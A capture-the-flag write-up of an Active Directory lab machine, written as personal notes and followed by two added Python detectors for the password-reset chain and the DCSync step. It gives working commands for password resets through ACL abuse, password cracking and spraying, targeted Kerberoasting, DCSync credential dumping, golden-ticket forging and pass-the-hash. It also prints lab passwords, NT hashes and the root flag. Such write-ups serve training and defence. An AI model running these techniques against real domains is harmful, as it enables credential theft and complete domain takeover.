## External Authenticated Access - `olivia`

We are given initial creds: `olivia:ichliebedich`

- SMB
  - **Domain:** `administrator.htb`
  - **Machine:** `DC`
  - shares? -> yes
    - `SYSVOL`
    - `NETLOGON` -> juicy <3
- LDAP
  - users? -> yes
- winrm -> yes

We can authenticate via winrm, so let's get a shell with evil-winrm:

```sh
evil-winrm -i $RHOST -u $USER -p $PASS
```

## Internal Authenticated Access - `olivia`

- Bloodhound.py? -> yes
  - `bloodhound-ce-python -u $USER -p $PASS -d administrator.htb -ns $RHOST --dns-tcp -c all`

Having a look at the Bloodhound graph reveals that `olivia` has [[GenericAll Permission - TODO]] on another user, `michael`. `GenericAll` is also known as full control: it allows the trustee to manipulate the target object however they wish, including resetting its password. Let's go ahead and reset his password:

```sh
net user michael password123!
```

Works out beautifully.

## Authenticated Internal Access - `michael`

- SMB
  - shares
    - NETLOGON
    - ...
- Bloodhound
  - `michael` has `ForceChangePassword` on `benjamin`.
  - we can set `benjamin`'s password and move laterally again.

```sh
net user benjamin password123! /administrator.htb
```

Doesn't work... let's attempt to use #tool/powerview then...

```powershell
upload powerview.ps1
Import-Module .\powerview.ps1
Get-NetDomain
```

And then re-attempt the password change...

```powershell
$SecPassword = ConvertTo-SecureString 'password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('administrator.htb\michael', $SecPassword)
$UserPassword = ConvertTo-SecureString 'password123!' -AsPlainText -Force
# the target of the reset is benjamin (the original line named michael, the wrong identity)
Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword -Credential $Cred
```

Also access denied??

```sh
net rpc password "benjamin" "password123\!" -U "administrator.htb"/"michael"%"password123\!" \
    -S "10.10.11.42"
```

## Authenticated External Access - `benjamin`

- SMB - nothing new
- winrm -> nope
- groups:
  - `Share Moderators`
    - could leverage [[Windows Runas - todo]] or something to start a shell as this user
- ftp? -> yes
  - files
    - `Backup.psafe3`
  - put? -> no

### `Backup.psafe3`

Some kind of encrypted database... https://pwsafe.org/ - made by the man, the myth, the legend, Bruce Schneier.

Let's #x/cracking using #tool/john

```
╭─[λ]-[admin.konstantinovitz.com]-[/targets/administrator/benjamin]-[10.10.11.42]
╰─> pwsafe2john.py Backup.psafe3 > Backup.hash
╭─[λ]-[admin.konstantinovitz.com]-[/targets/administrator/benjamin]-[10.10.11.42]
╰─> john --wordlist=/arsenal/wordlists/rockyou.txt Backup.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
tekieromucho     (Backu)
```

And we got a password: `tekieromucho`.

Opening and decrypting the file using #app/passwordsafe we get a couple of nice entries:

- `emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb`
- `alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw`
- `emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur`

```
UXLCI5iETUsIBoFVTj8yQFKoHjXmb
UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
WwANQWnmJnGV07WQN8bMS7FMAbjNur
```

Let's append those to a file and spray them around a little... We only seem to get a hit for `emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb`.

## `emily`

- smb -> nothing to see here
- winrm? -> da
- bloodhound?
  - groups? -> na
  - perms?
    -> `GenericWrite` on `ethan`

### Exploiting `GenericWrite` on `ethan`

- We can either go:
  - [[AD Shadow Credentials - TODO]] or
  - [[Target Kerberoasting]]

Let's attempt shadow credz:

```sh
pywhisker.py -d "administrator.htb" -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" --target "ethan" --action "add"
```

And the targeted Kerberoast route:

```sh
targetedkerberoast.sh -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
```

Kinda worked, but we need to sync time first (Kerberos rejects requests whose timestamp is too far off the DC's clock):

```sh
sudo ntpdate $RHOST
```

Giving the targetedkerberoast another shot and we get a hash, which cracks to `limpbizkit`.

## `ethan`

- smb -> nothing to see
- winrm -> nada
- groups?
  - nothing interesting
- outbound object control?
  - Has `DCSync` on the domain controller -> WIN.

### `DCSync` Attack

```sh
secretsdump.py 'administrator.htb'/'ethan':'limpbizkit'@'10.10.11.42'
```

Aaaand we get a massive dump here. Let's attempt a [[Golden Ticket - TODO]].

### [[Golden Ticket - TODO]]

**Find the #AD/auth/NTLM for the #AD/account/krbtgt**

```
# from secretsdump.py output
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
# this is the actual NT Hash
1181ba47d45fa2c76385a82409cbfaf6
```

**Find/confirm Domain SID**

```sh
lookupsid.py administrator.htb/ethan:limpbizkit@10.10.11.42
...
S-1-5-21-1088858960-373806567-254189436
...
```

Next, leverage #tool/impacket/ticketer to forge the ticket for #AD/user/administrator:

```sh
ticketer.py -nthash 1181ba47d45fa2c76385a82409cbfaf6 -domain-sid S-1-5-21-1088858960-373806567-254189436 -domain administrator.htb -user Administrator $RHOST
```

This will output a `10.10.11.42.ccache` file which may be used by #protocol/kerberos aware tools such as `smbclient` and `wmiexec`:

```sh
export KRB5CCNAME=10.10.11.42.ccache
```

Then have a go at some remote fun:

```sh
psexec.py -k -no-pass administrator.htb/[email protected]
```

Or just straight up connect as `Administrator` using his NT Hash:

```sh
# line from secretsdump output
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
# his NT Hash
3dc553ce4b9fd20bd016e098d2d2fd2e
# connection
evil-winrm -i $RHOST -u 'Administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
```

## `Administrator`

Aaand we're in:

```
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/26/2025  11:23 AM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e10ec86221ae1337db595cbbf1ac979a
```

## Lessons Learned

- Got #tool/powerview going for some more enum options
- Learned about #protocol/smb/samba tooling: the `net` command.
- Enumerate harder
- Had to download a couple of tools
- Got some reps in using secretsdump
- Learned about applying the golden ticket attack
- Need a Windows machine to compile Windows source tooling
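Detection side of the `olivia` -> `michael` -> `benjamin` password resets above, as an added example that is not part of the original notes: the allow-list and the key=value event lines are constructed here, but the fields are the ones a real 4724 (password reset attempt) event carries.

```python
# Added example, not part of the original notes: flag event 4724 (password reset
# attempt) where one account resets another's password, which is exactly the trace
# the olivia -> michael -> benjamin ACL-abuse moves leave in the DC's Security log.
from collections import defaultdict

# Constructed sample events in a flat key=value form (a real 4724 carries the same
# fields in its EventData). 4738 is included as noise that must not match.
SAMPLE_EVENTS = """\
EventID=4724 SubjectUserName=olivia TargetUserName=michael TargetDomainName=ADMINISTRATOR
EventID=4724 SubjectUserName=michael TargetUserName=benjamin TargetDomainName=ADMINISTRATOR
EventID=4724 SubjectUserName=helpdesk01 TargetUserName=emma TargetDomainName=ADMINISTRATOR
EventID=4738 SubjectUserName=olivia TargetUserName=michael TargetDomainName=ADMINISTRATOR
"""

# Hypothetical allow-list of accounts that legitimately reset other users' passwords.
AUTHORIZED_RESETTERS = {"helpdesk01"}

def parse(line):
    """Turn 'k=v k=v ...' into a dict."""
    return dict(tok.split("=", 1) for tok in line.split())

def suspicious_resets(text, authorized=AUTHORIZED_RESETTERS):
    """Return (subject, target) pairs for 4724 events raised by an account that is
    neither the target itself nor on the allow-list."""
    hits = []
    for line in text.splitlines():
        ev = parse(line)
        if ev.get("EventID") != "4724":
            continue
        subj, tgt = ev["SubjectUserName"], ev["TargetUserName"]
        if subj.lower() != tgt.lower() and subj not in authorized:
            hits.append((subj, tgt))
    return hits

def reset_chains(pairs):
    """Link resets where an account that was just reset goes on to reset another:
    the lateral chain a GenericAll / ForceChangePassword path produces."""
    nxt = defaultdict(list)
    for subj, tgt in pairs:
        nxt[subj].append(tgt)
    reset_targets = {t for _, t in pairs}
    chains = []
    for subj, tgt in pairs:
        if subj in reset_targets:
            continue                        # not a chain start
        chain = [subj, tgt]
        while chain[-1] in nxt and len(chain) < 64:   # length guard against cycles
            chain.append(nxt[chain[-1]][0])
        chains.append(chain)
    return chains
```

The chain view is the useful bit: a single helpdesk reset is routine, a reset whose target then resets someone else within the same hour almost never is.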
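Detecting the `DCSync` step above from the DC's own audit log, as an added example that is not part of the original notes: the replication-right GUIDs are the well-known schema values, while the 4662 event lines and the `MSOL_sync01` allow-list entry are constructed for the example.

```python
# Added example, not part of the original notes: detect the DCSync step above.
# secretsdump.py asks the DC to replicate directory data, which the DC audits as
# event 4662 on the domain object with the replication control-access rights.
# Only DC computer accounts and a few known sync accounts should ever hold them.
import re

# Control-access right GUIDs replication needs (well known from the AD schema).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Hypothetical allow-list, e.g. an Entra ID Connect service account.
ALLOWED_REPLICATORS = {"MSOL_sync01"}

# Constructed 4662 events; the Properties field lists the accessed rights as GUIDs.
# The all-zero GUID stands in for some unrelated property access.
SAMPLE_4662 = """\
EventID=4662 SubjectUserName=DC$ ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=ethan ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2};{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
EventID=4662 SubjectUserName=ethan ObjectType=user Properties={00000000-0000-0000-0000-000000000000}
EventID=4662 SubjectUserName=MSOL_sync01 ObjectType=domainDNS Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
"""

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

def parse(line):
    """Turn 'k=v k=v ...' into a dict."""
    return dict(tok.split("=", 1) for tok in line.split())

def dcsync_alerts(text, allowed=ALLOWED_REPLICATORS):
    """Return [(account, [right names])] for replication-right accesses made by
    accounts that are neither DC computer accounts nor on the allow-list."""
    alerts = []
    for line in text.splitlines():
        ev = parse(line)
        if ev.get("EventID") != "4662":
            continue
        rights = [REPL_RIGHTS[g.lower()] for g in GUID_RE.findall(ev["Properties"])
                  if g.lower() in REPL_RIGHTS]
        if not rights:
            continue                     # some other object or property access
        who = ev["SubjectUserName"]
        if who.endswith("$") or who in allowed:
            continue                     # DCs replicate among themselves; known sync accounts too
        alerts.append((who, rights))
    return alerts
```

A full credential dump needs Get-Changes together with Get-Changes-All, so alerting on the pair from a non-DC account is the high-confidence signal; the lasting fix is to find and remove the replication ACEs Bloodhound showed on `ethan`, not just to reset his password.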